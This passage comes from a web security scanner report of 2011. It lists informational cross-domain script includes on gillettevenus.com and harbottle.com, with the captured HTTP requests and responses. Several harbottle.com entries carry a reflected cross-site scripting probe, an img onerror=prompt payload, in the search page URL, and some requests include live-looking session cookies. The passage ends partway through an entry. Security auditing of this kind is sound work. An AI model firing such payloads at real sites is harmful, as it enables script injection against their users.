Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.7.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:37 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:37 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 89549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->


                                                <script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&amp;lID=1&amp;loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.115. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/products/refillables/embrace_purple/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:32 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:32 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 81708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->


                                                <script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&amp;lID=1&amp;loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.116. http://www.gillettevenus.com/en_US/razor_finder/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/razor_finder/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en_US/razor_finder/index.jsp HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; preferredLocale=en_US; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:24 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:24 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 12747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->


                                                <script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&amp;lID=1&amp;loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.117. http://www.gillettevenus.com/en_US/search/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/search/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en_US/search/index.jsp?q=razorphonehelpfaq HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.5.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; preferredLocale=en_US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:34 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:34 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 13622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<hea
...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->


                                                <script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&amp;lID=1&amp;loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.118. http://www.gillettevenus.com/global/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /global/blank.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /global/blank.html?bv=t&h=959&w=1266 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Mon, 28 Sep 2009 14:48:47 GMT
ETag: "239af8-69a-474a4652191c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Blank</title>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.119. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/article_view_hnl/1689.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hnl/pages/article_view_hnl/1689.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:41 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 35226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.120. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/articles/direct_beauty_products_trimsole.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hnl/pages/articles/direct_beauty_products_trimsole.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/pubs/479
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.121. http://www.harbottle.com/hnl/pages/hnl.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hnl/pages/hnl.php?gclid= HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 13666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.122. http://www.harbottle.com/hnl/pages/hnl_search2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /hnl/pages/hnl_search2.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 11173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.123. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5175
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.124. http://www.harbottle.com/hnl/pages/hnl_search2.php/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/a

Issue detail

The request is an image fetch (Accept: image/png) for a path below hnl_search2.php/, which the server answers with the HTML search page (200, text/html) rather than an image. That page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl_search2.php/a HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5108
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.125. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The request is an image fetch (Accept: image/png) for a path below hnl_search2.php/, which the server answers with the HTML search page (200, text/html) rather than an image. That page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5134
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.126. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The request is an image fetch (Accept: image/png) for a path below hnl_search2.php/, which the server answers with the HTML search page (200, text/html) rather than an image. That page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5120
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.127. http://www.harbottle.com/hnl/pages/pubs/479

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/pubs/479 HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.128. http://www.harbottle.com/hnl/pix/newsletters/50th_logo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pix/newsletters/50th_logo.jpg

Issue detail

The response is a 404 error page, and that page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/50th_logo.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.129. http://www.harbottle.com/hnl/pix/newsletters/ESportsMasthead.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pix/newsletters/ESportsMasthead.jpg

Issue detail

The response is a 404 error page, and that page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/ESportsMasthead.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.130. http://www.harbottle.com/hnl/pix/newsletters/gronholm_NSLTR.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pix/newsletters/gronholm_NSLTR.jpg

Issue detail

The response is a 404 error page, and that page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/gronholm_NSLTR.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:43 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.131. http://www.harbottle.com/hnl/pix/newsletters/rugby3.jpg

Summary

